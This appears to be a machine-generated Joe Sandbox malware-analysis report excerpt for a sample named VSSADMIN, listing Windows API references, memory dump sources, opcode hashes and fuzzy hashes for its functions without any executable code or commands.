• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message
• String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2030045667-1655038675
• Opcode ID: b8fd690a5a2264474b6c5daba4af4280a6f19887d0f050df518d7380527136c0
• Instruction ID: 5067d7a9787a24981a0425461bf047e5ed231096b45583fac2050321c02ac1f1
• Opcode Fuzzy Hash: b8fd690a5a2264474b6c5daba4af4280a6f19887d0f050df518d7380527136c0
• Instruction Fuzzy Hash: 6051A422A0DE8286EA209B55E4803BA62B2FB86FB5F544137DE4DC7795EF3CE545C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,-00000018,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF64
• GetProcAddress.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,-00000018,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF70
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
• Instruction ID: 9faa76ad0f9db54a2a93986ea945017a36405945ec8f955a11fa8faa09d66ba8
• Opcode Fuzzy Hash: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
• Instruction Fuzzy Hash: C941E471B19E1392FA15CB16A8805B522B2BF46FB0F084137DD0EC7798EE3DE846A344
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5685d0f25caf721876973ab72b1472ebb2d945ece1dea6ed4e4a06a13e7fea7a
• Instruction ID: b024cd018be5e20a4874668f1fac934165e01dcbf1ff94a235946bc27ce63cec
• Opcode Fuzzy Hash: 5685d0f25caf721876973ab72b1472ebb2d945ece1dea6ed4e4a06a13e7fea7a
• Instruction Fuzzy Hash: D8C1B23290CE8791EA609B15D4802BE6A70FB83FA0F554137EA5E87792EF7DE445D700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C57C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C607
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
• Instruction ID: 8ec18fb021b556b2e0f1d3e6acc8e776c965f3dcf430bb9058c7f304fe65182d
• Opcode Fuzzy Hash: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
• Instruction Fuzzy Hash: D991CF32A18E5395F7608F6594C42BD2BB0BB46FA8F54513BDE0EA3A95DF38D482D700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
• Instruction ID: 18f7f7ec65ed05b9de3eaf02fb1f48b45cf8e88610e79f34814b461ec7ee7253
• Opcode Fuzzy Hash: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
• Instruction Fuzzy Hash: 2E51D672F049228AEB14DB64D9C56BC27B1BB56B78F504136DE1ED3AE5DF38A402CB00
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 1452418845-0
• Opcode ID: 43fd9ef1ec5574f9622d8b8e8f0d0ca9553bbdc8c9993cf27e28b57b512a640d
• Instruction ID: 1a9aaf4158639f587fd48fa07908b1b63d74956d7f4ae854f33bcb677f76da95
• Opcode Fuzzy Hash: 43fd9ef1ec5574f9622d8b8e8f0d0ca9553bbdc8c9993cf27e28b57b512a640d
• Instruction Fuzzy Hash: F5317820E0DD4342FA14AB64E4D13BA22B1AF93FAEF405037DB0DC76E3EE2DA4448251
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: 90acb52a2f85a750f88b8c0786b469e374ae1bde126679d263a64c2465fb0c5e
• Instruction ID: 6e746ff8c10a07264a1b2750a7be2a62dccb794005f63ddfb84f973f81dd184b
• Opcode Fuzzy Hash: 90acb52a2f85a750f88b8c0786b469e374ae1bde126679d263a64c2465fb0c5e
• Instruction Fuzzy Hash: E2417262D18B8283F7548B61D590379B270FB96B74F10933AE69C83AD1EF7CA5A09704
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: c535fe1fb7e6e6615454c236fb49958ba2bf46abcf1afe76e887743b7fa28a67
• Instruction ID: d10d9bc1b8a75e8ebe7ff1e67e24daa55a29c9097a653680f72ccc03f642dc00
• Opcode Fuzzy Hash: c535fe1fb7e6e6615454c236fb49958ba2bf46abcf1afe76e887743b7fa28a67
• Instruction Fuzzy Hash: 86D09218F18F4796EE182B75B8D517A12726F4AFA5F10183AC84B87793CE2FA8495221
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
• Instruction ID: d63eb1cfdc3b1a358e1555099081bbf8e1bf2162cb84e394e83cfe1a099c9834
• Opcode Fuzzy Hash: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
• Instruction Fuzzy Hash: CB511561B0DA8347EA68DE2594E067A62A0BF46FB5F144732DE6CC37D5CF3CD4018600
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Initialize_invalid_parameter_noinfo_set_fmode
• String ID:
• API String ID: 3548387204-0
• Opcode ID: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
• Instruction ID: 7dac8cf696f043d08095e1d376b5c02c65d0c39e38cb242a4132a6de8e27f6f2
• Opcode Fuzzy Hash: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
• Instruction Fuzzy Hash: AA119D44E0CA4343FA5877B588C62FA01B05FA3B7AF840436EB0EC71D3ED5DB8404262
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0C6
• GetLastError.KERNEL32(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0D0
Similarity
• API ID: ChangeCloseErrorFindLastNotification
• String ID:
• API String ID: 1687624791-0
• Opcode ID: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
• Instruction ID: 1cbc991455a442d19bc62fd000a59500d9951bf783d4da7aa4dbcd4893adfa7f
• Opcode Fuzzy Hash: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
• Instruction Fuzzy Hash: A421A421F18E4341FA505769A4D037D25A19F86FB4F04523BDA2EC73D6CF6EE445A301
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B680
• GetLastError.KERNEL32(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B68A
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
• Instruction ID: 0cbb14d3c37acebcc0054627e3272f1c9e17f948f01dec6ec1feade9a862164d
• Opcode Fuzzy Hash: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
• Instruction Fuzzy Hash: E211C161B18E8281DA208B25E884169B371BB86FF4F544336EE7D8B7E9DF3CE0148700
Uniqueness
Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF614C86831), ref: 00007FF614C869D7
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF614C86831), ref: 00007FF614C869ED
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
• Opcode ID: bf2dc69d1c671b65f6fe74b61b09bd13a14de0638ac0b577694877a04e2cb74c
• Instruction ID: 26f789cead0624a97e08d5b75c98d14bd99aa0a56921d839e71615d07107ef4b
• Opcode Fuzzy Hash: bf2dc69d1c671b65f6fe74b61b09bd13a14de0638ac0b577694877a04e2cb74c
• Instruction Fuzzy Hash: 87015E7261CA5282E7545F14E48127AB7B1FB82B75F604237E6AD825D4DF7ED050DB00
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
• GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
Similarity
• API ID: ErrorLastPrivilegeRelease
• String ID:
• API String ID: 1334314998-0
• Opcode ID: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
• Instruction ID: f2fe67c0897fc9482d6441b18da886230114c02c67fad160bd95c4e5623bad8f
                                                                                                                                                                      • Opcode Fuzzy Hash: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                      • Instruction Fuzzy Hash: 92E08650F08E4353FF189BF194C417512705F87F60B44503AC80EC3251EE2CA9459200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID:
• API String ID: 377330604-0
• Opcode ID: f413b4ddc67d8632ac5557a0a97acca73a4185b66c4a9911fb05703a719da85e
• Instruction ID: fd31f18b22c4eb6ae250733453a6587bfc4b5050ecef8b03c2ffe3a81b0c74f3
• Opcode Fuzzy Hash: f413b4ddc67d8632ac5557a0a97acca73a4185b66c4a9911fb05703a719da85e
• Instruction Fuzzy Hash: E8D01214F2DE4391EA1827755CC533921B03F46F34FD00637C01EC31D1EE1EA0956101
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 85f758df515426b71bd3396e0c87f7450f551412155cbcefa8c343172ad84c23
• Instruction ID: d4926ad4f19582852a5e67f2cd32d7dc07bbaccf79acf8defe075354dccf635b
• Opcode Fuzzy Hash: 85f758df515426b71bd3396e0c87f7450f551412155cbcefa8c343172ad84c23
• Instruction Fuzzy Hash: 38D01224F19E4391EA1837755CC563811B07F46F78F910637C01EC31D1EE1EE1996101
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
• _findclose.LIBCMT ref: 00007FF614C76F19
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide_findclose
• String ID:
• API String ID: 2772937645-0
• Opcode ID: e2d0104db5e0f9ebe8afac4b65564d71e0016f36bf532ebb6ddabb36bb2b0c3c
• Instruction ID: 00c8cb951e60bbec03345006576054dbfd5067d1d1c42baadcfbb853ce7136a1
• Opcode Fuzzy Hash: e2d0104db5e0f9ebe8afac4b65564d71e0016f36bf532ebb6ddabb36bb2b0c3c
• Instruction Fuzzy Hash: C2717C52E18EC582E611CB2CC5452FD7370F7AAB68F55E322DB9C52592EF28E2D9C700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
• Instruction ID: 03ae247b27809fa9dc73bbb45872fdf4a5ba0edb87a9d231745c0654aac005f1
• Opcode Fuzzy Hash: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
• Instruction Fuzzy Hash: B7419E32908A4787EA24CA19E58127973B1EB97FA1F140232E78EC36D1DF2CE402E750
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: ffcdb3f93acbc7b642b0c367d7ec6e2fdf44ecd7681d82c6a1385de564375a62
• Instruction ID: b63e5b07194cf5a7f77fe1ab55d2cf8db54b057f4d9f915d165a8fd17a857cbd
• Opcode Fuzzy Hash: ffcdb3f93acbc7b642b0c367d7ec6e2fdf44ecd7681d82c6a1385de564375a62
• Instruction Fuzzy Hash: 4E21A621B0EA5647FA249B1269847FAA661BF46FE5F885432EE0D87786DE3DF041C700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
• Instruction ID: bdca0d7cf7522b048a09474cbe80d8adb55b27009ca6eefbae7a56d23ab045d5
• Opcode Fuzzy Hash: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
• Instruction Fuzzy Hash: 1531AE71A18E4385EB11AB59888037C7670AF83FB4F41063BEA2D873D2DF7DA441A714
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: 6fb3310ffc3292af0fdd94bbbd9082ba6701090cdfedec6a3c43b4571714928a
                                                                                                                                                                      • Instruction ID: bcc1aa7efde8f78bb98c088f62af5696711bb5bfbb60d52fda648f2d1bfb8ee7
                                                                                                                                                                      • Opcode Fuzzy Hash: 6fb3310ffc3292af0fdd94bbbd9082ba6701090cdfedec6a3c43b4571714928a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B218B32E04A0689EB249F64D4802ED33B0FB45B6CF140A3AD62C87EC6DF78D544CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                      • Instruction ID: 851e6e4591848b8cd216b5c5358cf1129bc3be11b57677648a27b92bad48828b
                                                                                                                                                                      • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                      • Instruction Fuzzy Hash: 15119621A0CA5381EF609F51948027DA2B0BFD7FA5F444437EA8CC769ADF7CD500A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                      • Instruction ID: 7db7c192fe2b76f524c7c5b2199fb77893a77cb47f2a59ddee350370a1325f0f
                                                                                                                                                                      • Opcode Fuzzy Hash: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
